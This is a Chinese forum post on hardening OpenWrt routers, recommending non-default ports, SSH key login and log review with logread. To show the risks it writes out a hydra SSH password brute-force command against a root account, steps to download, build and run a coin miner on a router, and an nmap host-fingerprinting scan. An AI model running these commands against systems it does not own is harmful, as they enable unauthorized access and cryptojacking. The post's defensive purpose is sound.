|
|
本帖最后由 EldersJavas 于 2020-4-20 22:47 编辑
第一次发帖,自己技术很渣,请大佬们多多指教
混迹恩山一段时间,大佬如云,也解决了我的很多问题,
最近读了不少关于个人信息安全的文章,虽然离大家都很遥远,但实际上漏洞百出.
大家可能都想:我自己路由器又没有别人连,自己也没什么信息可偷.
但是,越是我们不注意的地方越容易入侵,因此我们还是要注意一下安全的.
至于为什么不发到网络安全区里,一个是这个教程比较适合openwrt,再一个,那个区看的人也比较少...
首先我举几个细思极恐的例子:
1.假设你的朋友图谋不轨(哈哈),并且知道了你的连接密码.
2.假设你的路由器某个端口暴露在外,恰恰那个端口的服务是有漏洞的(不要感觉搞笑,这样的例子太多了)
3.假设自己电脑中病毒,路由器和路由器的其他用户会...
所以用人话说的话一般(注意是一般)会出现以下几个风险:
1.一个打算搞你的人在你的网络里
2.你的路由器外部端口被利用
3.内部主机出现无法管控的情况(和情况1差不多)
你又会想了:怕啥,路由器搞坏了再刷,还能进自己电脑咋滴
那我们来几个实战:
1.破解正常的ssh密码
你知道这个操作多简单吗,只需要一行代码
- hydra -l root -P pwd2.dic -t 1 -vV -e ns -o 存个地方.txt 192.168.1.1 ssh
这不是最恐怖的...最恐怖的是绝大部分的ssh登录的都是root用户,root能干撒大佬们都心知肚明.
然后大佬们又说了:怕啥,不就个ssh,能干啥
2.路由器先挖个kuang如果你会shell,一行也够了(好像所有代码用shell一行也能实现...)
最近比较火的有某X字头矿,某Hub上也有开源的挖此kuang软件
手打也就6行:
- >wget https://github.com/你懂的/你懂的.tar.gz
- tar -zxvf 你懂的.tar.gz
- ./configure
- make
- make install
- xxxxx xxx(你懂的)
你又说了:管他,我随随便便给他关了
3.问候你电脑和手机
首先随随便便扫个IP
呦呦呦,出来个设备192.168.1.100,再来
- nmap -sV -T4 -O -F --version-light 192.168.1.100
(看到这里,不知道你心里什么感受,我猜是想骂我了)
前面三个情况,随便一个都很容易搞这三个步骤,大佬们肯定懂.
最恐怖的是,ssh仅仅是众多openwrt漏洞中的一个,由于openwrt自带的ssh版本不是最新,即使你把密码设置的再复杂,也可以通过中间人漏洞利用你.
下面就是本贴精华内容(没错,你完全可以把上面当成废话)
1.藏得住端口
注意,此方法只适用于和我一样菜的新手和网络大面积扫描
新手肯定是使用各种工具的,比如最出名的某k字头系统自带的网络恶俗套装
而大面积扫描,一个个端口扫描必定会浪费大量资源
于是,小白式的新手工具或代码一般只会扫描著名端口(就是各种服务默认的端口)
例子很多:21(FTP)/22(SSH)/80(Web)/443(https)/8080(偷懒改个网站端口)/53(DNS)/139(论坛里大部分包的samba端口)
如果你端口全部默认,就中枪了
改也特别简单,全部都换个端口行了,web面板上大部分能修改,实在不行上指令
2.经得起验证
还是拿最典型的SSH为例(虽然telnet也能搞,但是毕竟要淘汰了么)
web面板下面有个ssh密钥,大部分人不太会用,这里顺便教一下最简单的设置
ps:上面这个代码框吞了我打的三次代码,只能在下面打了
#################
#到Linux系统里搞
cd /root/.ssh
ssh-keygen -t rsa -b 4096
vi id_rsa.pub
#把里面文本复制到web面板ssh公钥文本框里保存
ssh -i ./id_rsa root@192.168.1
#################
这样,除非有人打开你电脑偷走密钥(id_rsa文件)不然谁也无法使用ssh了
如果大家还想搞点别的花样,我可以再水个新帖好好搞搞ssh
3.日志抓小偷
删库跑路...那只能怪你惹得人太残暴
日志现在openwrt比较常用的就是logread,直接输看看效果(盗了个图,侵删)
你会发现信息跑半年,比较难受
那好办,咱还有指令,logread -h看看都能干啥
几个常用的:
- logread -l 数 #显示最近的几行日志
- logread -p 路径 #将日志输出到指定文件
还想写几个的,这样吧,以后我可以专门开个水贴,时不时更新几个安全知识
还请大佬们轻喷轻喷
第一次发帖,给大家发个福利,送大家最开始一直提到的那个软件吧,无论是检查网络问题还是搞点小事情都挺好用
Nmap官网:https://nmap.org/dist/nmap-7.80-setup.exe
度盘还是直接挂掉
太慢试试这个:http://sqdownd.onlinedown.net/down/nmap-7.01-setup.zip
请不要胡乱输入以及粘贴、复制等方式灌水
请尊重作者、并共同维护网站的正常阅读,否则账户将会被限制发帖、回帖,并且积分可能会被清零,站内短信以及阅读权限等都会受到影响,谢谢。
具体限制方式:https://www.right.com.cn/forum/thread-8307840-1-1.html
|
评分
-
查看全部评分
|
/1 
简体中文
繁體中文
English
日本語
Deutsch
한국 사람
بالعربية
TÜRKÇE
português
คนไทย
IP卡
狗仔卡
发表于 2020-4-20 22:38
置顶卡
沉默卡
喧嚣卡
顶贴卡
显身卡
